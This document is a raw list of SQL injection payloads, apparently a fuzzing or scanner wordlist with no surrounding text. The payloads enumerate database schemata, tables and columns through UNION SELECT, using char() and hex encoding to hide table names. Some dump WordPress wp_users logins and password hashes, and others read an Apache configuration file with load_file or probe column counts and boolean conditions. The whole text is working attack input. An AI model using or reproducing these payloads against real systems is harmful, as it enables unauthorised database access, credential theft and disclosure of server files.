UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 3,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 4,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 5,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 6,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 7,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 8,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 9,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,schema_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.schemata LIMIT 0,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,schema_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.schemata LIMIT 1,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,schema_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.schemata LIMIT 2,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 0,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 1,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 10,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 11,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 12,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 13,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 14,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 15,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 16,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 17,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 18,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 19,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 2,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 20,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 21,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 22,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 23,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 24,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 25,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 26,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 27,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 28,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 29,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 3,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 30,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 31,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 32,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 33,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 34,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 35,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 36,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 37,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 38,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 39,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 4,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 40,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 41,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 42,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 43,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 44,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 45,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 46,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 47,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 48,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 49,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 5,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 6,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 7,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 8,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,table_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.tables where table_schema=Concat(char(109),char(101),char(115),char(115),char(110),char(101),char(114),char(98),char(95),char(119),char(114),char(100),char(49),char(50)) LIMIT 9,1-- 1 and 1=0 Union Select 0x76697369626C65313233343536373839313031313132313331313131 -- 1 and 1=0 Union Select 1 -- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(0x5B6B65795D,USER(),0x5B6B65795D))) -- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(0x5B6B65795D,database(),0x5B6B65795D) )) -- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F617061636865322F617061636865322E636F6E66),0x5B6B65795D) )) -- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(0x5B6B65795D,version(),0x5B6B65795D))) -- 1 and 1=0 Union Select 0x787878756E696F6E787878-- 1 union select 1 union select 8234578999,2,3 -- 1 union select 98565256,2,3 -- 1 union select all user_login from wp_users 1 union select all user_pass from wp_users 1 union select concat(user_login,0x3a,user_pass) from wp_users -- 1 union select user_login from wp_users -- 1 union select user_login from wp_users where id=1 -- 1 union select user_pass from wp_users -- 1 union select user_pass from wp_users where id=1 -- 1 union select version() - 1 union select version() - UNION ALL SELECT null from msdb..backupfile-- 1 union select version() - UNION ALL SELECT null from mysql.db-- 1 union select version() - and 1=0 1 union select version() - and 1=1 1 union select version() -" and "x"="x 1 union select version() -" and "x"="y 1 union select version() -' 1 union select version() -' and 'x'='x 1 union select version() -' and 'x'='y 1 union select version() -- 999999.9 or 1=1 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536,0x31303235343830303536-- 999999.9 union all select 0x31303235343830303536-- 999999.9' or 'x'='x 999999.9' union all select 0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x 